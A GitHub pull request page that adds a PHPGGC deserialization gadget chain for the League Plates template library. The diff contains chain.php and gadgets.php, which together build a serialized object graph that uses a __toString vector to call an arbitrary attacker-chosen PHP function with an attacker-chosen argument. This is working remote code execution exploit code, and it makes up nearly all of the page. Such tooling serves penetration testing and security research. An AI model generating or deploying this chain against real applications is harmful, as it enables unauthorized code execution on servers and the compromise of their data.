Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

added Plates RCE gadget chain #211

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
28 changes: 28 additions & 0 deletions gadgetchains/Plates/RCE/1/chain.php
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
<?php
namespace GadgetChain\Plates;

class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
public static $version = '3.5.0 >= 3.6.0';
public static $vector = '__toString';
public static $author = 'Tris0n';

public function generate(array $parameters)
{
$function = $parameters['function'];
$parameter = $parameters['parameter'];

return new \League\Plates\Template\Template(
new \League\Plates\Template\Template(
new \League\Plates\Engine(
new \League\Plates\Template\Functions(
new \League\Plates\Template\Func(
$function
)
)
)
),
$parameter
);
}
}
61 changes: 61 additions & 0 deletions gadgetchains/Plates/RCE/1/gadgets.php
Original file line number Diff line number Diff line change
@@ -0,0 +1,61 @@
<?php

namespace League\Plates\Template
{
class Template
{
protected $name;
protected $engine;

public function __construct(object $Engine, string $parameter = null)
{
if($parameter !== null)
{
$this->name = $parameter;
}

$this->engine = $Engine;
}
}

class Functions
{
protected $functions = array();

public function __construct(object $Func)
{
$this->functions = [
"getResolveTemplatePath" => $Func
];
}
}

class Func
{
protected $callback;
protected $name;

public function __construct($function)
{
$this->name = $function;

$this->callback = [
$this,
'getName'
];
}
}
}

namespace League\Plates
{
class Engine
{
protected $functions;

public function __construct(object $Functions)
{
$this->functions = $Functions;
}
}
}